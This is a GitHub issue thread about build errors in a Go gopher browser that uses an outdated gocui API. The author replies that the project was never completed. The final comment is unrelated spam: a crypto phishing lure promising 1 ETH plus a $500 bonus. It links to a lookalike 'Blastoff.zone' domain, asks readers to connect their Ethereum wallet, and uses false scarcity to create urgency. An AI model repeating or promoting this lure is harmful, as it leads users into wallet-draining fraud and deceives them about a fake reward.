### ISSUE TITLE
Can't build interface.go: too many errors

### ISSUE THREAD

**Issue by arne-cl** [therainingmonkey/gopher#1]
Which version of gocui would I need to build this?

```
$ go get github.com/jroimartin/gocui
$ go build
# _/home/arne/bin/gopher
./interface.go:18:13: undefined: gocui.ErrorUnkView
./interface.go:27:13: undefined: gocui.ErrorUnkView
./interface.go:37:29: multiple-value g.SetCurrentView() in single-value context
./interface.go:45:9: undefined: gocui.Quit
./interface.go:51:13: undefined: gocui.ErrorUnkView
./interface.go:63:4: g.ShowCursor undefined (type *gocui.Gui has no field or method ShowCursor)
./interface.go:76:3: g.ShowCursor undefined (type *gocui.Gui has no field or method ShowCursor)
./interface.go:109:21: not enough arguments in call to gocui.NewGui
        have ()
        want (gocui.OutputMode)
./interface.go:109:21: multiple-value gocui.NewGui() in single-value context
./interface.go:118:48: undefined: gocui.Quit
./interface.go:118:48: too many errors
```

**Comment by therainingmonkey** [comment]
Sorry, I've no idea which version of gocui this was using, but this project was never really complete anyway. Perhaps I aught to make that more clear in the readme.

It would probably be easier to use this code as inspiration for your own gopher browser than to get this to build, in my opinion.

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
